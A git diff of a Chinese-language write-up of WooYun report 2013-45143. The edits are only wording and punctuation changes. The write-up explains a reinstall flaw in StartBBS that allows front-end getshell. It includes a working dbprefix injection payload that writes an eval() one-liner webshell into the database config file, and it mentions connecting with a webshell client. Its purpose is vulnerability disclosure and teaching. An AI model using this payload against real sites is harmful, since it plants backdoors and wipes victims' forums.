--- a/論PHP常見的漏洞/1.3 WooYun-2013-45143：開源輕論壇StartBBS前台getshell.md
+++ b/論PHP常見的漏洞/1.3 WooYun-2013-45143：開源輕論壇StartBBS前台getshell.md
@@ -1,9 +1,9 @@
 ###  WooYun-2013-45143：開源輕論壇StartBBS前台getshell
 
 ### 詳細說明
-心血來潮讀讀代碼.StartBBS界面挺清爽的，體積也小。下載下來安裝。
-安裝好後發現根目錄下多了一個install.lock，一般的CMS為了防止被重安裝就會在目錄下生成一個類似的文件，下次有人再訪問安裝腳本的時候，腳本會檢測，如果目錄下有這個文件就提示"請刪除後再安裝"。
-原本應該是沒有任何問題的但我們來到安裝腳本，/應用/控制器/ install.php了中，查看它是怎麼處理的：
+心血來潮讀讀代碼。 StartBBS界面挺清爽的，體積也小。下載下來安裝。
+安裝好後發現根目錄下多了一個install.lock，一般的cms為了防止被重安裝就會在目錄下生成一個類似的文件，下次有人再訪問安裝腳本的時候，腳本會檢測，如果目錄下有這個文件就提示"請刪除後再安裝"。
+原本應該是沒有任何問題的。但我們來到安裝腳本，/app/controllers/install.php中，查看它是怎麼處理的：
 
 
 ```php
@@ -30,8 +30,8 @@ class Install extends Install_Controller
     }
 ```
 
-函數裡檢查是否存在install.lock，然後用JavaScript的的方式告訴用戶"系統已安裝過"，然後跳轉。但是這個腳本根本還沒有結束嘛，這個類裡的函數都可以運行，並不因為返回了一個window.location.href就停止運行。（這 - > myclass->通知（）中也沒有停止運行的代碼）
-然後，在往下翻，就能看到安裝的函數：
+函數裡檢查是否存在install.lock，然後用javascript的方式告訴用戶"系統已安裝過"，然後跳轉。但是這個腳本根本還沒有結束嘛，這個類裡的函數都可以運行，並不因為返回了一個window.location.href就停止運行。 （this->myclass->notice()中也沒有停止運行的代碼）
+　　然後，在往下翻，就能看到安裝的函數：
 
 
 ```php
@@ -89,7 +89,7 @@ public function step($step)
 
                 if (!$conn) {
 
-                    die('無法連接到數據庫服務器，請檢查用戶名和密碼是否正確');
+                    die('無法連接到資料庫服務器，請檢查用戶名和密碼是否正確');
 
                 }
 
@@ -97,7 +97,7 @@ public function step($step)
 
                     if([[email protected]](/cdn-cgi/l/email-protection)_query('CREATE DATABASE IF NOT EXISTS '.$dbname)){
 
-                        die('指定的數據庫（'.$dbname.'）系統嘗試創建失敗，請通過其他方式建立數據庫'）;
+                        die('指定的資料庫（'.$dbname.'）系統嘗試創建失敗，請通過其他方式建立資料庫'）;
 
                     }
 
@@ -105,7 +105,7 @@ public function step($step)
 
                 if(!mysql_select_db($dbname,$conn)){
 
-                    die($dbname.'數據庫不存在，請創建或檢查數據名.');
+                    die($dbname.'資料庫不存在，請創建或檢查資料名.');
 
                 }
 
@@ -216,9 +216,9 @@ public function step($step)
     }
 ```
 
-當步驟函數的參數為3時，就執行安裝函數_install_do（），這個函數裡初始化了數據庫，並把數據庫配置文件寫入了"/app/config/database.php"。於是，我們可以構造一下數據包直接把一句話寫入到這個配置文件裡。
+當步驟函數的參數為3時，就執行安裝函數_install_do（），這個函數裡初始化了資料庫，並把資料庫配置文件寫入了"/app/config/database.php"。於是，我們可以構造一下資料包直接把一句話寫入到這個配置文件裡。
 
-我們看到,這個函數接收了許多post數據:
+我們看到,這個函數接收了許多post資料:
 
 ```php
 　　$dbhost = $this->input->post('dbhost');
@@ -233,7 +233,7 @@ public function step($step)
 　　$sub_folder = '/'.$this->input->post('base_url').'/';
 ```
 
-其中`dbhost`、`dbport`、`dbname`、`dbuser`、`dbpwd`都不能隨便亂寫，亂寫的話安裝就會出錯，而`userid`、`pwd`、`email`、`sub_folder`都是寫入數據庫的，不寫入配置文件。所以就剩下`dbprefix`了，所以我們可以這樣構造這個字段：
+其中`dbhost`、`dbport`、`dbname`、`dbuser`、`dbpwd`都不能隨便亂寫，亂寫的話安裝就會出錯，而`userid`、`pwd`、`email`、`sub_folder`都是寫入資料庫的，不寫入配置文件。所以就剩下`dbprefix`了，所以我們可以這樣構造這個字段：
 ```php
 dbprefix=sb_';@eval ($_POST[101]);$xxx='
 ```
@@ -243,7 +243,7 @@ dbprefix=sb_';@eval ($_POST[101]);$xxx='
 
 因為這個重安裝漏洞破壞性太大，getshell以後網站等於重置了，所以我沒有在網上測試。測試都在本地進行~
 首先在外面找一個可以外連的mysql賬號，為的是讓安裝成功進行。
-我這裡在我vps上新建了一個賬號test_db_user，然後構造下面的這個數據包，發送：
+我這裡在我vps上新建了一個賬號test_db_user，然後構造下面的這個資料包，發送：
 
 ![1.3-1](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/1.3/1.3-1.jpg)
 
@@ -253,7 +253,7 @@ dbprefix=sb_';@eval ($_POST[101]);$xxx='
 
 ![1.3-2](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/1.3/1.3-2.jpg)
 
-可以看到，一句話已經寫入了。菜刀連接index.php就可以了，直接連這個數據庫配置文件是不行的。
+可以看到，一句話已經寫入了。菜刀連接index.php就可以了，直接連這個資料庫配置文件是不行的。
 
 
 ![1.3-3](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/1.3/1.3-3.jpg)
